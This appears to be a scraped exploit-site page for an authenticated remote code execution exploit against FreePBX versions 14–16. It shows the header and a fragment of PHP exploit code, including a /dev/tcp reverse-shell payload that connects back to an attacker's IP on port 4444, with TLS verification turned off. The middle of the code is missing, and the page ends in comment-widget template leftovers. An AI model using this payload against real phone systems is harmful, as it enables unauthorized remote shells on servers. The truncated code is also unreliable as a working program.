FreePBX 16 Remote Code Execution
# Exploit Title: FreePBX 16 – Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Cold z3ro
# Date: 6/1/2024
# Tested on: 14,15,16
# Vendor: https://www.freepbx.org/
%26 /dev/tcp/’.$backconnectip.’/4444 0>%261)’);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
echo $response = curl_exec($ch).”\n”;
curl_close($ch);
?>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
| Date: {{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1 {{ x.comment }} |
GIPHY App Key not set. Please check settings